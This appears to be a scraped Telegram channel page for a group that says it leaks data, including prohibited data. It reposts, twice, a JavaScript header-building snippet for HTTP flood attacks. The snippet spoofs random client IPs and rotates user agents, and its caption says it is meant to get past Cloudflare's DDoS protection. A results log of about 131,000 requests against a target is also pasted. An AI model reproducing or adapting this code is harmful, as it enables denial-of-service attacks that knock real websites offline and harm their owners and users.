LeakingCode | LC On Top!
Open in Telegram
On this channel we leak data. The data that was leaked included various types of data ranging from general data to prohibited data and other similar things Channel Created By @Lintar21
Show more1 757
Subscribers
No data24 hours
No data7 days
+1730 days
Posts Archive
Repost from LeakingCode | LC On Top!
function getRandomIP() {
return (
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256)
);
}
function getRandomUserAgent() {
const userAgents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
];
return userAgents[Math.floor(Math.random() * userAgents.length)];
}
let spoofedIP = getRandomIP();
let headers = {};
headers[":method"] = "GET";
// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";
// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";
// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;
// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";
// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";
// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddosš CloudFlare š š¦ Total Count: All Request ā„ 131173 Request Successful ā„ 100373 (76.52 %) Request Blocked ā„ 30800 (23.48 %) āāāāāāā š« Allowed Request: āāāāāāā ā„ HTTP Protocol: HTTP/2 ā„ HTTP ResponseStatus: 200 ā„ Count: 100373 āāāāāāā ā„ Count: 100373 ā„ Percentage: 76.52 % āāāāāāā š Bypassed Request: āāāāāāā ā„ Count: 0 ā„ Percentage: 0.00 % āāāāāāā š” Blocked Request: āāāāāāā ā„ Count: 30747 ā„ Action: Block ā„ RequestHTTPMethod: GET ā„ RequestHTTPProtocol: HTTP/2 ā„ RequestScheme: https ā„ ResponseStatus: 403 ā„ Trigger Rules: HTTP DDos āāāāāāā ā„ Count: 42 ā„ Action: Managed Challenge ā„ RequestHTTPMethod: GET ā„ RequestHTTPProtocol: HTTP/2 ā„ RequestScheme: https ā„ ResponseStatus: 403 ā„ Trigger Rules: Security Level āāāāāāā ā„ Count: 11 ā„ Action: Managed Challenge ā„ RequestHTTPMethod: GET ā„ RequestHTTPProtocol: HTTP/1.1 ā„ RequestScheme: https ā„ ResponseStatus: 403 ā„ Trigger Rules: Security Level āāāāāāā ā„ Count: 30800 ā„ Percentage: 23.48 % āāāāāāā You are not currently in an invisible state, the statistics will be displayed in the leaderboard according to the ranking of the data Thanks for using this serviceš Data from user: Lintar š
function getRandomIP() {
return (
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256)
);
}
function getRandomUserAgent() {
const userAgents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
];
return userAgents[Math.floor(Math.random() * userAgents.length)];
}
let spoofedIP = getRandomIP();
let headers = {};
headers[":method"] = "GET";
// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";
// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";
// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;
// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";
// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";
// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddos